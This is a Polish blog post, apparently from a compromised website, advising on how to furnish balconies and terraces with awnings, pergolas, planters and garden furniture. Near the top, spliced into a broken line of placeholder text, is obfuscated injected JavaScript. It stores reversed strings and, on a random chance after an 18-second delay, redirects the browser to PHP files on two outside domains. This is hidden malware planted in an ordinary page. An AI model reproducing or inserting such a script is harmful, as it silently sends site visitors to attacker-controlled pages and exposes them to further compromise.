You are currently viewing Ładnie urządzony taras – markizy tarasowe
Conubia nostra, per ince$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos

Ładnie urządzony taras – markizy tarasowe

Planując aranżację nowego domu lub też szykując się do generalnego remontu starego budynku nie można zapomnieć o miejscach takich jak taras czy balkon. W tych zewnętrznych „pokojach” również można stworzyć ciekawy wystrój nawiązujący do pory roku lub też całoroczny. Pomagają w tym markizy tarasowe czy pergole, ale od początku…

markizy tarasoweOd czego powinniśmy zacząć urządzanie balkonu? Przede wszystkim przydały by się ciekawe, wygodne i zajmujące mało miejsca meble, które po sezonie można schować w piwnicy. Warto też zainwestować w kwietnik zawieszany na poręczy balkonu lub zamontowany do parapetu okna wychodzącego na balkon. Donice z kwiatami można również podwiesić do sufitu. W wypadku zamkniętych balkonów można w nich stworzyć prawdziwy wypoczynkowy pokój z wygodną sofą, dywanem i stoliczkiem do kawy.
Z kolei urządzenie tarasuto już trudniejsze zadanie. Bardzo często nasze tarasy są przedłużeniem salonu i ogrodzone w różny sposób od ogrodu. Najłatwiej jest zastosować pergole, które mogą być wysokie, niskie, mocno zabudowane lub ażurowe. Czasami ustawia się je dookoła tarasu, ale najczęściej tylko od bocznych stron z otwartą częścią na ogród. Dzięki temu można cieszyć się ładnym widokiem, ale ogranicza się boczny wiatr, który może być nieprzyjemny. Na tarasie można też zainstalować markizy tarasowe, które chronić będą przed zbyt mocnym słońcem lub deszczem. Taras zwykle ma całkiem sporą powierzchnię, więc warto na nim ustawić grill oraz zestaw mebli ogrodowych czy też leżaki do opalania. Jednak takie meble i grill warto schować po lecie do garażu, aby nie niszczały. Wejście do domu i okna na taras przed złodziejami mogą zabezpieczyć rolety zewnętrzne.

W Warszawie można znaleźć szeroki wybór gotowych rozwiązań tarasowych takich jak markizy cz pergole. Istnieje również możliwość wynajęcia firmy która obuduje taras według naszej wizji.